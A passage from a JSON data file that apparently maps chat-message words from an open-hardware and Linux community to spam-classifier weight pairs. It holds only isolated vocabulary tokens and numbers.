28224], "scary": [65535, 0], "red": [65535, 0], "peac": [65535, 0], "tenor": [65535, 0], "view": [24726, 40809], "gif": [65535, 0], "pics": [65535, 0], "ooh": [65535, 0], "hacking": [65535, 0], "smartphone": [27099, 38436], "confidence": [34352, 31183], "material": [65535, 0], "straps": [65535, 0], "aaron": [65535, 0], "jack": [65535, 0], "sucks": [65535, 0], "evening": [65535, 0], "nextcloud": [65535, 0], "portfolio": [30700, 34835], "packages": [37311, 28224], "xzcat": [65535, 0], "dd": [65535, 0], "sdcarddevice": [65535, 0], "unplugged": [65535, 0], "reconnect": [65535, 0], "sdcard": [65535, 0], "pc": [39757, 25778], "unexperienced": [65535, 0], "gui": [65535, 0], "tools": [37311, 28224], "fewer": [65535, 0], "risk": [34352, 31183], "rip": [65535, 0], "ih": [2419, 63116], "mixed": [65535, 0], "nvm": [65535, 0], "medical": [65535, 0], "discharge": [65535, 0], "udev": [65535, 0], "polkit": [65535, 0], "pam": [65535, 0], "tgere": [65535, 0], "bullseye": [65535, 0], "crimier": [65535, 0], "glad": [21018, 44517], "learned": [65535, 0], "artix": [65535, 0], "oof": [65535, 0], "braided": [65535, 0], "elastic": [65535, 0], "strings": [65535, 0], "woc": [65535, 0], "burst": [65535, 0], "pipe": [65535, 0], "tmux": [65535, 0], "session": [41813, 23722], "ftw": [65535, 0], "readings": [65535, 0], "hrm": [65535, 0], "consistently": [65535, 0], "k": [24254, 41281], "wiat": [65535, 0], "hmmm": [65535, 0], "xeon": [65535, 0], "dark": [65535, 0], "sudo": [65535, 0], "openarena": [65535, 0], "rm": [65535, 0], "jannik": [65535, 0], "callit": [65535, 0], "reader": [65535, 0], "opus": [65535, 0], "aac": [65535, 0], "seen": [41813, 23722], "acc": [65535, 0], "youtube": [65535, 0], "spotify": [65535, 0], "extracts": [65535, 0], "audio": [37311, 28224], "lollypop": [65535, 0], "premium": [45076, 20459], "movie": [65535, 0], "'s": [65535, 0], "vietnam's": [65535, 0], "war": [20045, 45490], "mash": [65535, 0], "cu": [65535, 0], "series": [65535, 0], "lots": [41813, 23722], "eps": [65535, 0], "cringe": [65535, 0], "her": [11832, 53703], "family": [14152, 51383], "likes": [6503, 59032], "uk": [43011, 22524], "proud": [9820, 55715], "holder": [65535, 0], "passport": [65535, 0], "accept": [37311, 28224], "apology": [65535, 0], "behalf": [65535, 0], "nation": [65535, 0], "chose": [65535, 0], "wowwww": [65535, 0], "overly": [65535, 0], "cheap": [65535, 0], "sucker": [65535, 0], "clock": [65535, 0], "systemtask": [65535, 0], "sorted": [65535, 0], "dunno": [65535, 0], "bridgebot": [65535, 0], "handles": [65535, 0], "edits": [65535, 0], "static": [65535, 0], "lv": [65535, 0], "manager": [13491, 52044], "telus": [65535, 0], "sweet": [65535, 0], "gotcha": [65535, 0], "heads": [65535, 0], "smaller": [65535, 0], "mvno": [65535, 0], "loomed": [65535, 0], "asleep": [65535, 0], "timezone": [65535, 0], "rn": [65535, 0], "americans": [65535, 0], "europeans": [65535, 0], "unhealthy": [65535, 0], "sleep": [51053, 14482], "schedules": [65535, 0], "sec": [65535, 0], "termbin": [65535, 0], "dl": [65535, 0], "plogs": [65535, 0], "jadethedev": [65535, 0], "wwyk": [65535, 0], "xsld": [65535, 0], "vx": [65535, 0], "ga": [65535, 0], "foo": [65535, 0], "calls": [65535, 0], "progress": [65535, 0], "er": [27750, 37785], "simple": [65535, 0], "pulseaudio": [65535, 0], "triggers": [65535, 0], "max": [65535, 0], "tim": [65535, 0], "gtg": [65535, 0], "bbl": [65535, 0], "moderators": [65535, 0], "cya": [65535, 0], "addrmicro": [65535, 0], "volte": [65535, 0], "vm": [65535, 0], "flagged": [65535, 0], "flag": [65535, 0], "'good'": [65535, 0], "'spam'": [65535, 0], "mining": [7932, 57603], "spamlog": [65535, 0], "false": [65535, 0], "positives": [65535, 0], "lined": [65535, 0], "quantomworks": [65535, 0], "soquartz": [65535, 0], "shutting": [65535, 0], "trip": [65535, 0], "avbdr": [65535, 0], "abce": [65535, 0], "gitlab": [65535, 0], "pmaports": [65535, 0], "klabz": [65535, 0], "thingiverse": [65535, 0], "kieranc": [65535, 0], "strawberry": [65535, 0], "cuddles": [65535, 0], "filtered": [65535, 0], "koala": [65535, 0], "range": [65535, 0], "\u00e5": [65535, 0], "jrgraphix": [65535, 0], "net": [65535, 0], "r": [52338, 13197], "ff": [30700, 34835], "label": [65535, 0], "infinitime": [65535, 0], "notification": [65535, 0], "ci": [65535, 0], "risky": [65535, 0], "dfu": [65535, 0], "shakewake": [65535, 0], "fuzzy": [65535, 0], "favourites": [65535, 0], "pts": [65535, 0], "integrated": [65535, 0], "color": [65535, 0], "picker": [65535, 0], "jacksonhu": [65535, 0], "downloading": [65535, 0], "export": [65535, 0], "lang": [65535, 0], "utf": [65535, 0], "src": [65535, 0], "nrfconnect": [65535, 0], "atleast": [65535, 0], "mcuboot": [65535, 0], "rw": [65535, 0], "theo": [65535, 0], "nov": [41813, 23722], "zip": [65535, 0], "bin": [65535, 0], "recovery": [37311, 28224], "loader": [65535, 0], "reflashing": [65535, 0], "nrf": [65535, 0], "odds": [65535, 0], "hmmmmmmm": [65535, 0], "submodule": [65535, 0], "bla": [65535, 0], "hygyke": [65535, 0], "danct": [65535, 0], "meeting": [30700, 34835], "save": [20045, 45490], "youtu": [65535, 0], "oimx": [65535, 0], "sj": [65535, 0], "cje": [65535, 0], "defo": [65535, 0], "hunt": [65535, 0], "supper": [65535, 0], "unvalidated": [65535, 0], "andriod": [65535, 0], "ahve": [65535, 0], "cli": [65535, 0], "collected": [65535, 0], "dropmefiles": [65535, 0], "irli": [65535, 0], "god": [27099, 38436], "noice": [65535, 0], "gotta": [65535, 0], "fork": [65535, 0], "yeee": [65535, 0], "ditto": [65535, 0], "gadgetbridge": [65535, 0], "koalav": [65535, 0], "wooooo": [65535, 0], "dogecoin": [20045, 45490], "ethereum": [2000, 63535], "investment": [1601, 63934], "printer": [65535, 0], "gstreamer": [65535, 0], "hw": [65535, 0], "decoding": [65535, 0], "collabora": [65535, 0], "liked": [65535, 0], "tweet": [6503, 59032], "insights": [65535, 0], "cryptozoology": [65535, 0], "decribed": [65535, 0], "marius": [65535, 0], "bloggt": [65535, 0], "braunschweig": [65535, 0], "de": [13591, 51944], "das": [65535, 0], "nackte": [65535, 0], "aufmotzen": [65535, 0], "flagging": [65535, 0], "wave": [65535, 0], "value": [34352, 31183], "deepl": [65535, 0], "sheibe": [65535, 0], "pronounced": [65535, 0], "shy": [65535, 0], "shibe": [65535, 0], "shiba": [65535, 0], "inu": [65535, 0], "doogoooooo": [65535, 0], "hund": [65535, 0], "dogo": [65535, 0], "doooooooooooooogoooooooooooo": [65535, 0], "bonjour": [65535, 0], "vc": [65535, 0], "nitter": [65535, 0], "justinesmithies": [65535, 0], "manjarolinux": [65535, 0], "jg": [65535, 0], "j": [29285, 36250], "echo": [65535, 0], "n": [25134, 40401], "cough": [65535, 0], "numberstation": [65535, 0], "kman": [65535, 0], "register": [33223, 32312], "portal": [65535, 0], "vol": [65535, 0], "doiwn": [65535, 0], "patch": [65535, 0], "recheck": [65535, 0], "pls": [49491, 16044], "el": [17737, 47798], "criticizing": [65535, 0], "charge": [60274, 5261], "mouse": [65535, 0], "ugh": [65535, 0], "frustrating": [65535, 0], "ekm": [65535, 0], "ekmps": [65535, 0], "shops": [65535, 0], "srbphotographic": [65535, 0], "leica": [65535, 0], "lens": [65535, 0], "eos": [65535, 0], "adaptor": [65535, 0], "canon": [65535, 0], "camera": [65535, 0], "schneider": [65535, 0], "kreuznach": [65535, 0], "xenar": [65535, 0], "paxette": [65535, 0], "remarkable": [65535, 0], "bubble": [65535, 0], "bokeh": [65535, 0], "en": [27252, 38283], "wikipedia": [41813, 23722], "precision": [65535, 0], "event": [8393, 57142], "timer": [65535, 0], "friend": [32885, 32650], "noted": [65535, 0], "froggychair": [65535, 0], "ribbit": [65535, 0], "\u00df": [65535, 0], "girl": [65535, 0], "millenial": [65535, 0], "train": [65535, 0], "station": [65535, 0], "left": [65535, 0], "walking": [65535, 0], "expression": [65535, 0], "face": [30700, 34835], "registration": [23277, 42258], "paste": [65535, 0], "iwconfig": [65535, 0], "rtl": [65535, 0], "cs": [26080, 39455], "uname": [65535, 0], "result": [51053, 14482], "noahhh": [65535, 0], "dmesg": [65535, 0], "log": [65535, 0], "journalctl": [65535, 0], "jctl": [65535, 0], "conenction": [65535, 0], "upstream": [65535, 0], "zlin": [65535, 0], "wgetpaste": [65535, 0], "remembered": [65535, 0], "enclosure": [65535, 0], "cursed": [65535, 0], "l": [29650, 35885], "kib": [65535, 0], "mib": [65535, 0], "mirc": [65535, 0], "webchat": [65535, 0], "ffs": [65535, 0], "varies": [65535, 0], "interact": [65535, 0], "fuego": [65535, 0], "por": [8393, 57142], "favor": [20045, 45490], "shh": [65535, 0], "platform": [6503, 59032], "cop": [65535, 0], "spammers": [65535, 0], "pinesat": [65535, 0], "pastebin": [65535, 0], "ket": [65535, 0], "ufvc": [65535, 0], "uploaded": [65535, 0], "testing": [65535, 0], "stable": [41813, 23722], "branches": [65535, 0], "screw": [65535, 0], "atcwatch": [65535, 0], "rooms": [65535, 0], "whoevermakesthebot": [65535, 0], "amazing": [21018, 44517], "kb": [45076, 20459], "bg": [30700, 34835], "ircop": [521, 65014], "unedited": [65535, 0], "wdym": [65535, 0], "ashamed": [65535, 0], "admit": [65535, 0], "brady": [65535, 0], "epaper": [65535, 0], "pinged": [65535, 0], "eep": [65535, 0], "huong": [20045, 45490], "memes": [65535, 0], "maany": [65535, 0], "options": [45076, 20459], "pong": [65535, 0], "trs": [65535, 0], "rebooted": [65535, 0], "reattached": [65535, 0], "feet": [65535, 0], "successfully": [11832, 53703], "instant": [24254, 41281], "glue": [65535, 0], "cyanoacrylate": [65535, 0], "ooops": [65535, 0], "die": [65535, 0], "maya": [45076, 20459], "armen": [65535, 0], "promptly": [65535, 0], "opened": [20045, 45490], "assigned": [11832, 53703], "ru": [30700, 34835], "woman": [27750, 37785], "close": [54038, 11497], "bruh": [65535, 0], "lie": [65535, 0], "school": [65535, 0], "saved": [65535, 0], "yours": [33685, 31850], "aya": [65535, 0], "isnotmyreal": [65535, 0], "share": [15449, 50086], "hold": [30700, 34835], "touchpad": [65535, 0], "spot": [65535, 0], "lovely": [8393, 57142], "cats": [65535, 0], "mounting": [65535, 0], "filesystem": [65535, 0], "enabling": [65535, 0], "ssh": [65535, 0], "helped": [23277, 42258], "nl": [65535, 0], "willing": [65535, 0], "trade": [5564, 59971], "ptime": [65535, 0], "sealed": [65535, 0], "items": [65535, 0], "ali": [65535, 0], "vat": [65535, 0], "thingy": [65535, 0], "surcharge": [65535, 0], "hidden": [12888, 52647], "owner": [65535, 0], "difference": [65535, 0], "between": [65535, 0], "operator": [65535, 0], "thermal": [65535, 0], "limits": [65535, 0], "openvpn": [65535, 0], "samba": [65535, 0], "sftp": [65535, 0], "readme": [65535, 0], "overhaul": [65535, 0], "completed": [49491, 16044], "unrealircd": [65535, 0], "spamfilter": [65535, 0], "yeet": [20045, 45490], "carry": [65535, 0], "forget": [45076, 20459], "curse": [65535, 0], "myself": [45076, 20459], "dpkg": [65535, 0], "grep": [65535, 0], "op": [65535, 0], "silly": [65535, 0], "keeps": [38990, 26545], "hanging": [65535, 0], "mmc": [65535, 0], "pushed": [65535, 0], "firewire": [65535, 0], "eta": [65535, 0], "xbox": [65535, 0], "pinetalk": [65535, 0], "security": [26080, 39455], "'pi'": [65535, 0], "'passwd'": [65535, 0], "password": [16591, 48944], "print": [65535, 0], "neofetch": [65535, 0], "history": [37311, 28224], "ui": [65535, 0], "awww": [65535, 0], "sleepy": [65535, 0], "programmers": [11832, 53703], "shure": [65535, 0], "radios": [65535, 0], "microcontrollers": [65535, 0], "defined": [65535, 0], "scam": [21950, 43585], "farming": [65535, 0], "groceries": [65535, 0], "beg": [65535, 0], "sir": [4063, 61472], "owe": [20045, 45490], "ur": [11832, 53703], "powersupply": [65535, 0], "soft": [65535, 0], "blocked": [65535, 0], "installing": [65535, 0], "hackrf": [65535, 0], "russodab": [65535, 0], "butttttt": [65535, 0], "i'": [65535, 0], "soooo": [65535, 0], "mayyyyybe": [65535, 0], "snappy": [65535, 0], "omnimnemonic": [65535, 0], "nheko": [65535, 0], "alpine": [65535, 0], "pmos": [65535, 0], "blind": [65535, 0], "smsing": [65535, 0], "pocket": [65535, 0], "writes": [65535, 0], "sms": [65535, 0], "yee": [65535, 0], "noo": [65535, 0], "becaus": [65535, 0], "insane": [65535, 0], "saves": [65535, 0], "batterru": [65535, 0], "explain": [20045, 45490], "reasoning": [65535, 0], "uh": [30700, 34835], "reinstall": [65535, 0], "htop": [65535, 0], "ahhh": [65535, 0], "wsl": [65535, 0], "graphical": [65535, 0], "'night": [65535, 0], "automate": [65535, 0], "tips": [65535, 0], "tricks": [65535, 0], "unlearn": [65535, 0], "mcse": [65535, 0], "studies": [65535, 0], "taught": [65535, 0], "ms": [30700, 34835], "dos": [65535, 0], "errr": [65535, 0], "ibm": [65535, 0], "freedos": [65535, 0], "magazine": [65535, 0], "reminds": [65535, 0], "copy": [65535, 0], "parties": [65535, 0], "amiga": [65535, 0], "copied": [65535, 0], "his": [23771, 41764], "tapes": [65535, 0], "brb": [65535, 0], "hows": [65535, 0], "serv": [65535, 0], "persisted": [65535, 0], "reboots": [65535, 0], "ich": [30700, 34835], "heisse": [65535, 0], "marvin": [65535, 0], "sole": [65535, 0], "money": [18667, 46868], "nowaaaay": [65535, 0], "seriously": [65535, 0], "assembled": [65535, 0], "square": [65535, 0], "initiative": [65535, 0], "omnicalculator": [65535, 0], "pixels": [65535, 0], "inch": [65535, 0], "competition": [20045, 45490], "marketing": [65535, 0], "photo": [65535, 0], "torch": [65535, 0], "liht": [65535, 0], "misc": [65535, 0], "ohno": [65535, 0], "myfixblog": [65535, 0], "eleccelerator": [65535, 0], "fusecalc": [65535, 0], "php": [65535, 0], "atmega": [65535, 0], "measured": [65535, 0], "charger": [65535, 0], "it'": [65535, 0], "slook": [65535, 0], "douable": [65535, 0], "careful": [65535, 0], "imgur": [65535, 0], "phwpvp": [65535, 0], "changed": [33985, 31550], "chrony": [65535, 0], "ime": [65535, 0], "occurs": [65535, 0], "thisis": [65535, 0], "solved": [65535, 0], "sy": [65535, 0], "konrad": [65535, 0], "review": [65535, 0], "baaa": [65535, 0], "convenience": [65535, 0], "giving": [14881, 50654], "loses": [65535, 0], "typed": [65535, 0], "argh": [65535, 0], "peeps": [65535, 0], "tolerance": [65535, 0], "ebay": [65535, 0], "itm": [65535, 0], "hash": [8393, 57142], "ad": [65535, 0], "jb": [2232, 63303], "aaoswgm": [65535, 0], "gamwr": [65535, 0], "expert": [16728, 48807], "firmware": [65535, 0], "sigmaris": [65535, 0], "jason": [49491, 16044], "host": [65535, 0], "atheatos": [65535, 0], "congrats": [65535, 0], "looser": [65535, 0], "strap": [65535, 0], "metal": [65535, 0], "fabric": [65535, 0], "soundrecord": [65535, 0], "wav": [65535, 0], "keeeyyyyyybboooaaarrrddd": [65535, 0], "giveee": [65535, 0], "meee": [65535, 0], "nowwww": [65535, 0], "holy": [65535, 0], "mobian": [65535, 0], "fells": [65535, 0], "supersonic": [65535, 0], "rocket": [65535, 0], "obnvv": [65535, 0], "rft": [65535, 0], "vega": [65535, 0], "fe": [20045, 45490], "badly": [65535, 0], "monkas": [65535, 0], "reee": [65535, 0], "xwkc": [65535, 0], "fl": [65535, 0], "suid": [65535, 0], "virus": [20045, 45490], "prepare": [11832, 53703], "rs": [5031, 60504], "qsdxh": [65535, 0], "ic": [5031, 60504], "hbiwjlqcup": [65535, 0], "eugenebright": [65535, 0], "jmnkgffj": [65535, 0], "unquartz": [65535, 0], "vibrationn": [65535, 0], "restarting": [65535, 0], "wm": [7884, 57651], "tpm": [65535, 0], "multiple": [45076, 20459], "siglo": [65535, 0], "amazfish": [65535, 0], "itd": [20045, 45490], "windknecht": [65535, 0], "loves": [20045, 45490], "simply": [65535, 0], "img": [65535, 0], "ftp": [65535, 0], "directory": [65535, 0], "throughfacepalm": [65535, 0], "todec": [65535, 0], "aiming": [65535, 0], "hamster": [65535, 0], "rocky": [65535, 0], "setting": [65535, 0], "balancing": [65535, 0], "carciblessup": [65535, 0], "fucking": [65535, 0], "zooommmmmmmm": [65535, 0], "unlock": [65535, 0], "adb": [65535, 0], "stdio": [65535, 0], "wot": [65535, 0], "pmso": [65535, 0], "aren": [65535, 0], "modems": [65535, 0], "realtek": [65535, 0], "yay": [65535, 0], "member": [65535, 0], "parallel": [65535, 0], "alone": [37311, 28224], "lsblk": [65535, 0], "ov": [65535, 0], "probes": [65535, 0], "bsandro": [65535, 0], "natt": [65535, 0], "finance": [8393, 57142], "yahoo": [65535, 0], "quote": [11832, 53703], "ss": [65535, 0], "billion": [65535, 0], "cny": [65535, 0], "chinese": [65535, 0], "domestic": [65535, 0], "exchanges": [65535, 0], "refund": [65535, 0], "docks": [65535, 0], "agreed": [65535, 0], "lool": [65535, 0], "axp": [65535, 0], "including": [65535, 0], "pwm": [65535, 0], "hops": [65535, 0], "safety": [65535, 0], "certification": [65535, 0], "kinds": [65535, 0], "sh": [65535, 0], "wut": [65535, 0], "died": [65535, 0], "ia": [65535, 0], "ukruhi": [65535, 0], "tracfone": [65535, 0], "imho": [65535, 0], "calcprogrammer": [65535, 0], "begin": [65535, 0], "stacktrace": [65535, 0], "sgt": [65535, 0], "puzzles": [65535, 0], "turns": [65535, 0], "confidential": [65535, 0], "why'd": [65535, 0], "lucky": [41813, 23722], "qufyfajqy": [65535, 0], "oops": [65535, 0], "decode": [792, 64743], "values": [65535, 0], "reliable": [10256, 55279], "daknig": [65535, 0], "called": [45076, 20459], "zynq": [65535, 0], "loved": [65535, 0], "nokia": [65535, 0], "binary": [17967, 47568], "hex": [65535, 0], "watchface": [65535, 0], "missed": [65535, 0], "eda": [65535, 0], "how's": [65535, 0], "swiftie": [65535, 0], "casio": [65535, 0], "plentie": [65535, 0], "sassie": [65535, 0], "watching": [51053, 14482], "futbol": [65535, 0], "conspiracy": [65535, 0], "tine": [65535, 0], "kkkkaaayyy": [65535, 0], "borrrrr": [65535, 0], "nnaaooooo": [65535, 0], "numworks": [65535, 0], "clak": [65535, 0], "cclakc": [65535, 0], "clakckcaklc": [65535, 0], "gnome": [65535, 0], "hot": [65535, 0], "nationality": [65535, 0], "antisemite": [65535, 0], "cant": [34352, 31183], "jewish": [65535, 0], "religious": [65535, 0], "candidate": [65535, 0], "dratini": [65535, 0], "uhh": [65535, 0], "fractal": [65535, 0], "confuse": [65535, 0], "core": [65535, 0], "db": [23277, 42258], "alarm": [65535, 0], "aur": [30700, 34835], "pinephoeb": [65535, 0], "sdp": [65535, 0], "eww": [65535, 0], "environment": [65535, 0], "aka": [65535, 0], "devfreq": [65535, 0], "paying": [20045, 45490], "jedec": [65535, 0], "members": [37311, 28224], "crystalgamma": [65535, 0], "bingo": [65535, 0], "nxp": [65535, 0], "mx": [65535, 0], "processors": [65535, 0], "base": [41813, 23722], "qm": [65535, 0], "ddr": [65535, 0], "aid": [65535, 0], "rpa": [65535, 0], "ta": [65535, 0], "pizza": [65535, 0], "covid": [41813, 23722], "pinepower": [65535, 0], "excatly": [65535, 0], "expectedly": [65535, 0], "cw": [65535, 0], "oooh": [65535, 0], "\u03bc": [65535, 0], "mistake": [8393, 57142], "rev": [65535, 0], "snd": [65535, 0], "hrtimer": [65535, 0], "ko": [65535, 0], "upgrading": [65535, 0], "marshmallow": [65535, 0], "repeat": [65535, 0], "kids": [65535, 0], "tysm": [65535, 0], "chromium": [65535, 0], "bool": [65535, 0], "motioncontroller": [65535, 0], "shouldstepalert": [65535, 0], "private": [30700, 34835], "decades": [65535, 0], "d'oh": [65535, 0], "trust": [16728, 48807], "beidou": [65535, 0], "drm": [65535, 0], "scheduler": [65535, 0], "pineserver": [65535, 0], "pinefridge": [65535, 0], "pinehal": [65535, 0], "tnx": [65535, 0], "questionmarkos": [65535, 0], "questionmarketos": [65535, 0], "ez": [65535, 0], "advertisement": [65535, 0], "haz": [65535, 0], "coupon": [65535, 0], "tooo": [65535, 0], "uhm": [65535, 0], "ohh": [65535, 0], "traditional": [65535, 0], "hdd's": [65535, 0], "hahah": [65535, 0], "sit": [23277, 42258], "corrected": [65535, 0], "sandisc": [65535, 0], "newer": [65535, 0], "fml": [65535, 0], "barebones": [65535, 0], "signal": [56923, 8612], "sr": [51053, 14482], "ht": [30700, 34835], "nicohman": [65535, 0], "mmmm": [65535, 0], "cooling": [65535, 0], "aww": [65535, 0], "previously": [65535, 0], "mago": [65535, 0], "c\u00f3smico": [65535, 0], "mesa": [65535, 0], "wayfire": [65535, 0], "mmh": [65535, 0], "meeeeeeeh": [65535, 0], "err": [65535, 0], "vidconsole": [65535, 0], "registered": [26080, 39455], "darn": [65535, 0], "jurapura": [65535, 0], "hola": [20045, 45490], "editor": [65535, 0], "ook": [65535, 0], "cookies": [65535, 0], "browsing": [65535, 0], "autosave": [65535, 0], "hackland": [65535, 0], "results": [28534, 37001], "peer": [20045, 45490], "puremaps": [65535, 0], "integrate": [65535, 0], "interfacing": [65535, 0], "dbus": [65535, 0], "inter": [65535, 0], "communication": [65535, 0], "pinetab": [65535, 0], "touchscreen": [65535, 0], "addressed": [65535, 0], "differently": [65535, 0], "fa": [23277, 42258], "mis": [20045, 45490], "avoiding": [65535, 0], "christmas": [34352, 31183], "gift": [2047, 63488], "totp": [65535, 0], "keepassdx": [65535, 0], "authenticator": [65535, 0], "codes": [65535, 0], "independent": [41813, 23722], "eliminates": [65535, 0], "math": [65535, 0], "interrupts": [65535, 0], "interrupt": [65535, 0], "triggered": [65535, 0], "unnecessarily": [65535, 0], "celebrate": [65535, 0], "woo": [65535, 0], "ow": [16279, 49256], "booted": [65535, 0], "dammit": [65535, 0], "suspending": [65535, 0], "huuuuuuh": [65535, 0], "huzzah": [65535, 0], "gn": [65535, 0], "gl": [65535, 0], "hf": [65535, 0], "hahaha": [65535, 0], "goodnight": [65535, 0], "intersting": [65535, 0], "megous": [65535, 0], "tmp": [65535, 0], "ba": [28534, 37001], "adc": [65535, 0], "develoled": [65535, 0], "yiu": [65535, 0], "anarken": [65535, 0], "biktorgj": [65535, 0], "poc": [65535, 0], "quality": [41813, 23722], "lines": [65535, 0], "photos": [65535, 0], "af": [65535, 0], "qippqwgutpt": [65535, 0], "qovvx": [65535, 0], "jwii": [65535, 0], "wy": [11832, 53703], "rvoa": [65535, 0], "huqy": [65535, 0], "qwm": [65535, 0], "imdsvmaid": [65535, 0], "z": [32885, 32650], "gggz": [65535, 0], "hvzq": [65535, 0], "alozoe": [65535, 0], "udedbduljx": [65535, 0], "dxz": [65535, 0], "drwkjbddhub": [65535, 0], "hqrw": [65535, 0], "throughput": [65535, 0], "softnology": [65535, 0], "biz": [65535, 0], "pdf": [65535, 0], "jep": [65535, 0], "av": [65535, 0], "'the": [65535, 0], "arb": [65535, 0], "abbreviation": [65535, 0], "arbiter'": [65535, 0], "highend": [65535, 0], "bootloaders": [65535, 0], "sane": [65535, 0], "repair": [65535, 0], "provider": [65535, 0], "binder": [65535, 0], "debug": [65535, 0], "btlequeue": [65535, 0], "characteristic": [65535, 0], "fb": [47550, 17985], "btle": [65535, 0], "aborting": [65535, 0], "transaction": [5564, 59971], "dinosaur": [65535, 0], "models": [65535, 0], "numbered": [65535, 0], "unlike": [65535, 0], "distributions": [65535, 0], "orange": [65535, 0], "detail": [65535, 0], "hype": [65535, 0], "reboot": [65535, 0], "incompatible": [65535, 0], "jaja": [65535, 0], "wha": [65535, 0], "sdb": [65535, 0], "wheel": [65535, 0], "visudo": [65535, 0], "fsync": [65535, 0], "bs": [37311, 28224], "command": [65535, 0], "ew": [65535, 0], "ryzen": [65535, 0], "pog": [65535, 0], "sux": [65535, 0], "santaclause": [65535, 0], "felipe": [65535, 0], "hurry": [11832, 53703], "plug'n'play": [65535, 0], "reading": [65535, 0], "state": [27750, 37785], "root": [65535, 0], "hrmm": [65535, 0], "uefi": [65535, 0], "mezzanine": [65535, 0], "inner": [65535, 0], "frame": [65535, 0], "funny": [65535, 0], "comers": [65535, 0], "primetime": [65535, 0], "replying": [2524, 63011], "sleeping": [65535, 0], "rose": [65535, 0], "earlier": [65535, 0], "removing": [65535, 0], "resistor": [65535, 0], "pads": [65535, 0], "highlight": [65535, 0], "matric": [65535, 0], "bleak": [65535, 0], "count": [65535, 0], "hehe": [65535, 0], "uu": [65535, 0], "cccm": [65535, 0], "ddu": [65535, 0], "hmmmmmmmmmmm": [65535, 0], "glxgears": [65535, 0], "demos": [65535, 0], "env": [65535, 0], "recently": [65535, 0], "moves": [65535, 0], "percussion": [65535, 0], "maintenance": [65535, 0], "howto": [65535, 0], "mnjro": [65535, 0], "recovering": [65535, 0], "journal": [65535, 0], "pissed": [65535, 0], "dereference": [65535, 0], "buggy": [65535, 0], "ttyl": [65535, 0], "mriesch": [65535, 0], "sandisk": [65535, 0], "cd": [20045, 45490], "faulty": [65535, 0], "mediums": [65535, 0], "points": [65535, 0], "heiko": [65535, 0], "initialized": [65535, 0], "opengl": [65535, 0], "es": [27346, 38189], "glgettexlevelparameteriv": [65535, 0], "requires": [45076, 20459], "aborted": [65535, 0], "dumped": [65535, 0], "drama": [65535, 0], "smh": [65535, 0], "we've": [65535, 0], "enjoy": [26080, 39455], "niel": [65535, 0], "jerram": [65535, 0], "mmcli": [65535, 0], "emergency": [65535, 0], "query": [65535, 0], "consider": [65535, 0], "ar": [65535, 0], "undefined": [65535, 0], "underdefined": [65535, 0], "irrelevant": [65535, 0], "netsplit": [65535, 0], "bpa": [65535, 0], "st": [65535, 0], "rq": [65535, 0], "pak": [65535, 0], "xmpp": [65535, 0], "search": [65535, 0], "manually": [65535, 0], "appearing": [65535, 0], "screens": [65535, 0], "oo": [6503, 59032], "fuuun": [65535, 0], "racks": [20045, 45490], "exoensive": [65535, 0], "hmmkay": [65535, 0], "relative": [65535, 0], "savings": [65535, 0], "move": [65535, 0], "nrfppk": [65535, 0], "bitchx": [65535, 0], "panasync": [65535, 0], "amigaos": [65535, 0], "step": [28534, 37001], "pet": [65535, 0], "skip": [65535, 0], "lowlevel": [65535, 0], "init": [65535, 0], "hmmmmmm": [65535, 0], "cheers": [65535, 0], "trickle": [65535, 0], "charges": [18610, 46925], "ron": [65535, 0], "rom": [65535, 0], "bypass": [65535, 0], "bios": [65535, 0], "pebble": [65535, 0], "timestyle": [65535, 0], "intel": [65535, 0], "atom": [65535, 0], "blood": [65535, 0], "sacrifice": [65535, 0], "bonus": [3421, 62114], "funky": [65535, 0], "dank": [65535, 0], "fonting": [65535, 0], "spo": [65535, 0], "infrared": [65535, 0], "sharing": [24254, 41281], "damnit": [65535, 0], "wsabillon": [65535, 0], "sigh": [65535, 0], "ended": [20045, 45490], "mobiscribe": [65535, 0], "windoze": [65535, 0], "machines": [65535, 0], "jump": [65535, 0], "jkjk": [65535, 0], "imei": [65535, 0], "opening": [65535, 0], "vout": [65535, 0], "bye": [65535, 0], "magisk": [65535, 0], "helps": [11832, 53703], "hide": [20045, 45490], "unlocked": [65535, 0], "older": [65535, 0], "zsultw": [65535, 0], "steve": [65535, 0], "rant": [65535, 0], "incoming": [65535, 0], "bannished": [65535, 0], "treason": [65535, 0], "trulg": [65535, 0], "types": [65535, 0], "societes": [65535, 0], "activate": [65535, 0], "global": [4063, 61472], "encrypted": [65535, 0], "anti": [65535, 0], "ddos": [65535, 0], "accelerator": [65535, 0], "cc": [65535, 0], "vbus": [65535, 0], "ground": [65535, 0], "aaaaaaaaa": [65535, 0], "described": [65535, 0], "injecting": [65535, 0], "measuring": [65535, 0], "resulting": [65535, 0], "voltages": [65535, 0], "tllim": [65535, 0], "funds": [6503, 59032], "ummm": [65535, 0], "hurts": [65535, 0], "whaaat": [65535, 0], "tue": [65535, 0], "ncr": [65535, 0], "heavy": [65535, 0], "bugger": [65535, 0], "ooof": [65535, 0], "muh": [65535, 0], "bloat": [65535, 0], "dann": [65535, 0], "following": [37311, 28224], "interest": [27750, 37785], "woah": [65535, 0], "jinx": [65535, 0], "yw": [11832, 53703], "hinting": [65535, 0], "tada": [65535, 0], "fedx": [65535, 0], "story": [28534, 37001], "hmmmm": [65535, 0], "tape": [65535, 0], "creating": [47550, 17985], "lithographic": [65535, 0], "masks": [65535, 0], "duksen": [65535, 0], "admire": [65535, 0], "gumption": [65535, 0], "bare": [65535, 0], "circa": [65535, 0], "ioshield": [65535, 0], "whew": [65535, 0], "igc": [65535, 0], "alr": [65535, 0], "heheheh": [65535, 0], "ahem": [65535, 0], "class": [37311, 28224], "sustained": [65535, 0], "transfers": [65535, 0], "talon": [65535, 0], "supercomputers": [65535, 0], "sweats": [65535, 0], "pinetree": [65535, 0], "infant": [65535, 0], "tree": [20045, 45490], "rite": [65535, 0], "brought": [20045, 45490], "joy": [17967, 47568], "caring": [65535, 0], "mike": [65535, 0], "taste": [37311, 28224], "pacing": [65535, 0], "heathen": [65535, 0], "spec": [65535, 0], "tinyurl": [4861, 60674], "ydt": [65535, 0], "ry": [20045, 45490], "morsedecoder": [65535, 0], "wooo": [65535, 0], "synthetic": [65535, 0], "bcache": [65535, 0], "injected": [65535, 0], "immediat": [65535, 0], "censored": [65535, 0], "pandemic": [30700, 34835], "selling": [65535, 0], "assumption": [65535, 0], "lsd": [65535, 0], "tfw": [65535, 0], "ideapad": [65535, 0], "hmmmmm": [65535, 0], "helper": [20045, 45490], "hence": [65535, 0], "touchboost": [65535, 0], "total": [30700, 34835], "transition": [65535, 0], "startup": [65535, 0], "usr": [65535, 0], "systemd": [65535, 0], "exists": [65535, 0], "clbin": [65535, 0], "jv": [65535, 0], 